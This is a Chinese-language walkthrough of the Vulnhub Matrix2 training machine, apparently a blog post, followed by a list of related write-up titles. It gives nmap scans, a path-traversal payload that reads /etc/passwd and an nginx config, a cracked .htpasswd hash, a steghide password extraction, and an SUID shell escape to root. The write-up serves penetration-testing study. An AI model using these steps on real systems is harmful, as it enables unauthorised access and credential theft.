Vulnhub靶机实战——Matrix2
Matrix2靶机下载地址: https://download.vulnhub.com/matrix/matrix2-Unknowndevice64.ova
环境: VMware 15虚拟机软件
Matrix2靶机IP地址: 192.168.220.159
Kali的IP地址: 192.168.220.155
Matrix2靶机与kali都以NAT模式连接到网络,查看kali的IP地址:192.168.220.155
ip addr
使用nmap
扫描192.168.220.0网段存活的主机,发现Matrix2靶机的IP地址为:192.168.220.159
nmap -sP -T4 192.168.220.0/24 -oN nmap220.sP
使用nmap全面扫描Matrix2靶机并查看已开放的端口,发现已开放80、1337、12320、12321、12322
端口
nmap -A -T4 -p- 192.168.220.159 -oN nmap159.A
分别打开相关端口查看页面
http://192.168.220.159/
https://192.168.220.159:1337/
https://192.168.220.159:12320/
https://192.168.220.159:12321/
https://192.168.220.159:12322/
在12322端口下,发现一个file_view.php
文件,但在robots.txt
文件发现禁用了file_view.php文件,怀疑存在任意文件包含漏洞
https://192.168.220.159:12322/robots.txt
https://192.168.220.159:12322/file_view.php
使用BurpSuite
抓取数据包,使用POST
传参,发现可以包含任意文件,查看/etc/passwd
文件
https://192.168.220.159:12322/file_view.php
file=../../../../../../../../../etc/passwd
网站是使用nginx搭建的,查看nginx的配置文件,发现了一个p4ss
文件夹比较可疑
file=../../../../../../../../../etc/nginx/sites-available/default
auth_basic_user_file /var/www/p4ss/.htpasswd;
打开p4ss文件夹下的.htpasswd
文件发现用户Tr1n17y
及加密后的密码
Tr1n17y:$apr1$7tu4e5pd$hwluCxFYqn/IHVFcQ2wER0
使用john工具爆破,得到密码admin
john hash.txt
Tr1n17y:admin
打开端口1337的网页登录用户,并查看源码发现隐藏了一张图片h1dd3n.jpg
https://192.168.220.159:1337/
打开图片并保存到本地
https://192.168.220.159:1337/h1dd3n.jpg
h1dd3n.jpg
图片使用了隐写,使用steghide
工具将隐写的文本导出,密码是:n30
steghide --extract -sf h1dd3n.jpg
P4$$w0rd
打开12320端口的靶机控制台,使用n30
用户及密码登录
https://192.168.220.159:12320/
n30/ P4$$w0rd
查看具有suid权限的命令,发现morpheus具体suid权限,可以借此提权
find / -perm -u=s -type f 2>/dev/null
使用以下命令提到root权限,并找到隐藏的flag
morpheus 'BEGIN {system("/bin/sh")}'
Vulnhub靶机实战——Matrix2相关推荐
- 全网最详细的渗透测试靶机实操步骤——vulnhub靶机实战(七)IMF【包含了sql注入,文件上传,gif图片木马制作,缓冲区溢出漏洞sploit等诸多知识点的靶机,超多干货】
靶机地址:https://www.vulnhub.com/entry/imf-1,162/ 靶机难度:中级(CTF) 靶机发布日期:2016年10月30日 靶机描述:欢迎使用" IMF&qu ...
- Vulnhub靶机实战——DC-8
靶机DC-8下载地址: https://download.vulnhub.com/dc/DC-8.zip 环境:VMware 15虚拟机软件 DC-8靶机IP地址:192.168.220.156 Ka ...
- Vulnhub靶机实战——DC-5
靶机DC-5下载地址:https://download.vulnhub.com/dc/DC-5.zip 环境:VMware 15虚拟机软件 DC-5靶机IP地址:192.168.220.139 Kal ...
- 挑战全网最详细靶机教程——vulnhub靶机实战 lampiao【适合刚接触的新人学习】
靶机地址:https://www.vulnhub.com/entry/lampiao-1,249/ 靶机难度:中等 工具:kalilinux: 一个灵活的脑子 : 一双手 目标:得到root权限&am ...
- 挑战全网最详细靶机教程——vulnhub靶机实战vulnhub Tr0ll: 1【适合刚接触的新人学习】
靶机地址:https://www.vulnhub.com/entry/tr0ll-1,100/ 靶机难度:简单 靶机发布日期:2014年8月14日 靶机描述:Tr0ll的灵感来自OSCP实验室中不断摇 ...
- Vulnhub靶机实战——Matrix3
下载地址: https://download.vulnhub.com/matrix/Machine_Matrix_v3.ova 环境: VMware 15虚拟机软件 Matrix3靶机IP地址:192 ...
- Vulnhub靶机实战——DC-3
靶机DC-3下载地址:https : //download.vulnhub.com/dc/DC-3.zip 靶机DC-3VMware下载地址:https : //download.vulnhub.co ...
- DC-5 vulnhub靶机实战
首先是使用virtualbox安装,这里不推荐vmware,会出很多问题. nmap扫一下子网,看靶机的ip地址: 发现ip是192.168.240.137,开放了80和111端口. 给了提示是个文件 ...
- Vulnhub靶机实战-Forensics
声明 好好学习,天天向上 搭建 vmware打开,网络和攻击机一样,桥接模式 渗透 存活扫描,发现目标 arp-scan -l 端口扫描 nmap -T4 -A 192.168.31.152 -p 1 ...
最新文章
- spring+mybatis事务的readonly属性无效
- 谁说AI无用?疫情下,AI已经代替人类做了很多...
- vue.js项目文件搭建
- mysql 备份工具xtrabackup全备与还原图解
- python取反函数_Python优雅的反函数int(string,base)
- final const java_Java中的final关键字 与 C#中的const, readonly关键字
- Java对象都是在堆上分配空间吗?答案竟然是...
- C语言 求sin(x)的近似值
- go:linkname
- MySQL误删数据?快速恢复指南来了!
- js小数运算出现多为小数问题_js小数计算小数点后显示多位小数的实现方法
- python usb通信测试
- ORBSLAM3整体框架
- 量子计算机王,王正汉|量子计算机:下一轮工业革命的引擎
- 《持续集成实践指南》第3章 Gitlab基本配置与使用
- 第九届河南省程序设计大赛-NYOJ-1276(搜索batter)
- H5微信授权登录后点击返回出现循环登录无法退出问题
- 大盘下跌时,如何做空股市,继续赚钱?
- 虚拟自动取款机ATM设计(C语言)
- 【Log】(二)Java 中的日志框架 JCL、SLF
热门文章
- java 修改word_Java 修改/替换Word批注
- 几句话直观理解java中Scanner类的next()、nextLine()、nextInt()
- excel读取mysql数据库_我有一个mysql数据库,现在想通过excel电子表格读取里面的数据,需要怎么操作?...
- 中年人可以学计算机吗,中老年学电脑的好处
- 对提取的目标轮廓上色
- fruitstrap安装app
- 以PDF转DjVu为例分析软件和人工转换的区别
- 就打一个小补丁?Win 10一周年更新版亮相
- PSP dev lesson 05
- TMS-EEG概念介绍